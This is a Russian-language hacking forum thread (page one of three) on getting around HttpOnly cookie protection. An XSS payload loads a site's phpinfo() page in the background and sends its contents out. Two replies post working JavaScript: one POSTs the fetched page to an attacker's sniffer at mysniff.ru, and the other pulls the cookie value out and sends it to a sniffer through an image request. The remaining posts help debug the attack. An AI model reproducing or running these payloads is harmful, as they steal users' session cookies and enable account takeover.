Форум АНТИЧАТ
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Загрузка кода страницы phpinfo() через xss ( тунель) (https://forum.antichat.xyz/showthread.php?t=439741)

bazaWT 10.04.2016 10:24
Появилась идея обойти httponly кукис через страничку phpinfo. Чтобы пользователь зайдя на страничку с xss в фоновом режиме открывал phpinfo() а html код странички отправлялся нам . Может уже кто то реализовал такое ?

blackbox 10.04.2016 13:13
Цитата:
Сообщение от bazaWT
bazaWT said:

Появилась идея обойти httponly кукис через страничку phpinfo. Чтобы пользователь зайдя на страничку с xss в фоновом режиме открывал phpinfo() а html код странички отправлялся нам . Может уже кто то реализовал такое ?
Вот пример, с помощью ajax открывается нужная страница и ее содержимое отсылается на целевой сниферок. Только для снифера нужно разрешить принимать запросы с других доменов (CORS):

Код:
Code:
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange= function() {
if (xhttp.readyState == 4 && xhttp.status == 200) {
 
        var body = encodeURIComponent(xhttp.responseText);
        xhttp.open("POST", 'http://mysniff.ru/t.php', true)
        xhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')
        xhttp.send(body)
     
    }
};

xhttp.open("GET", "phpinfo.php", true);
xhttp.withCredentials = true;
xhttp.send();
Я не знаю как себя будет на практике вести - в боевых условиях не тестил. Но может пригодится.

faza02 10.04.2016 17:35
надеюсь @psihoz26 меня не покорает за его скрипт)

Код:
Code:
var xhr = new XMLHttpRequest();
xhr.open('GET', '//site/phpinfo.php', true);
xhr.send(null);
xhr.onreadystatechange = function() {
    if (xhr.readyState == 4) {
        if(xhr.status == 200) {
            (new Image()).src="//%сниффер%/?"+xhr.responseText.match(/_COOKIE.*?(.*?)/m)[1]
        }
    }
}

bazaWT 10.04.2016 19:10
Спасибо друзья +

bazaWT 11.04.2016 09:54
Цитата:
Сообщение от yarbabin
yarbabin said:

надеюсь
@psihoz26
меня не покорает за его скрипт)
Код:
Code:
var xhr = new XMLHttpRequest();
xhr.open('GET', '//site/phpinfo.php', true);
xhr.send(null);
xhr.onreadystatechange = function() {
    if (xhr.readyState == 4) {
        if(xhr.status == 200) {
            (new Image()).src="//%сниффер%/?"+xhr.responseText.match(/_COOKIE.*?(.*?)/m)[1]
        }
    }
}
Не могу разобратся со скриптом, он должен исполнятся прямо в XSS или можно подгружать с другого домена ? Пробовал подгружать, но на сниф ничего не приходит, Firebug показывает что скрипт подгружается, но следующего этапа - загрузки phpinfo() не показывает . Кроме того в сниф надо что то дописывать? он у меня простенький

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR

M_script 11.04.2016 10:32
Цитата:
Сообщение от bazaWT
bazaWT said:

Пробовал подгружать, но на сниф ничего не приходит, Firebug показывает что скрипт подгружается, но следующего этапа - загрузки phpinfo() не показывает
В любом браузере есть инструменты разработчика, где можно посмотреть ошибки выполнения JS.

bazaWT 11.04.2016 12:25
Цитата:
Сообщение от M_script
M_script said:

В любом браузере есть инструменты разработчика, где можно посмотреть ошибки выполнения JS.
Ошибки JS нет , он подгружается из другого домена ( ответ 200) , но в инструментах разработчика нигде не написано что браузер обращается к site.com/info.php

t0ma5 11.04.2016 12:39
Цитата:
Сообщение от bazaWT
bazaWT said:

Ошибки JS нет , он подгружается из другого домена ( ответ 200) , но в инструментах разработчика нигде не написано что браузер обращается к site.com/info.php
такое может происходить если куки не распарсились, посмотри вывод phpinfo, там точно есть массив HTTP_COOKIE ?

blackbox 11.04.2016 12:48
Цитата:
Сообщение от bazaWT
bazaWT said:

Ошибки JS нет , он подгружается из другого домена ( ответ 200) , но в инструментах разработчика нигде не написано что браузер обращается к site.com/info.php
Поставь fiddler и посмотри что куда шлется (и шлется ли вообще?). И на своем принимаемом скрипте нужно еще указать:

Код:
Code:

M_script 11.04.2016 14:45
Цитата:
Сообщение от bazaWT
bazaWT said:

Ошибки JS нет
Добавь в начале кода строку "window.onload = function() {", в конце "}". Также укажи протокол в ссылках "http://" или "https://" вместо "//", не все браузеры поддерживают.

Цитата:
Сообщение от blackbox
blackbox said:

И на своем принимаемом скрипте нужно еще указать:
Кроссдоменные запросы отправляться будут, получить ответ нельзя, но это и не нужно в данном случае.


Время: 12:59
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице